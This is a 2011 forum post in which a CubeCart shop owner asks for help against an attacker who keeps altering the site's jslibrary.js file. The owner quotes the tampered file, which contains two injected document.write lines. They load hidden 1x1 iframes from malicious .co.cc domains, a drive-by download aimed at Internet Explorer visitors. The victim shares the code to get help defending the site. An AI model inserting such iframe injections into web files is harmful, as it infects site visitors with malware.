Guest valtam Posted January 28, 2011 Share Posted January 28, 2011 As the thread title says, somehow, a person is able to access and change the /js/jslibrary.js file and place malicious code in it. Upon doing this, anyone who visits the site in Internet Explorer (Safari and Firefox appear immune to this attack) gets a popup from a .co.cc domain wanting to install something malicious. In my Cubecart backend, I have noticed in the Admin Sessions area, some attempts to login followed by the attackers ip address (see screenshots). Even after replacing the jslibrary.js file with a fresh one and changing the ftp etc passwords, they are still able to add malicious code to the jslibrary.js file. I need help to prevent and block further the ability to access my jslibrary.js file which keeps getting altered. Please help, its starting to get really annoying Normal jslibrary.js file code (from the top of the file): // display decision alert box function decision(message, url){ if(confirm(message)) location.href = url; } // open browser window function openPopUp(url, windowName, w, h, scrollbar) { var winl = (screen.width - w) / 2; var wint = (screen.height - h) / 2; winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scrollbar; win = window.open(url, windowName, winprops); if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); } } Altered jslibrary.js file: // display decision alert box function decision(message, url){ if(confirm(message)) location.href = url; } document.write("<iframe src='http://hsdhdshsdfher.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAQMHBgINBQ==' width='1' height='1' frameborder='0'></iframe>"); document.write("<iframe src='http://dedede4.co.cc/notfound/inkujrgzk.php?n=setup2432' width='1' height='1' frameborder='0'></iframe>"); // open browser window function openPopUp(url, windowName, w, h, scrollbar) { var winl = (screen.width - w) / 2; var wint = (screen.height - h) / 2; winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scrollbar; win = window.open(url, windowName, winprops); if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); } } In cPanel I also block access to the ip's, but all they (hacker) do is go get a new .co.cc domain name. I really don't want to have to build this website from scratch as it took a very long time to set up. I am hoping someone will be able to help me stop access to the jslibrary.js file from being repeatedly modified. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.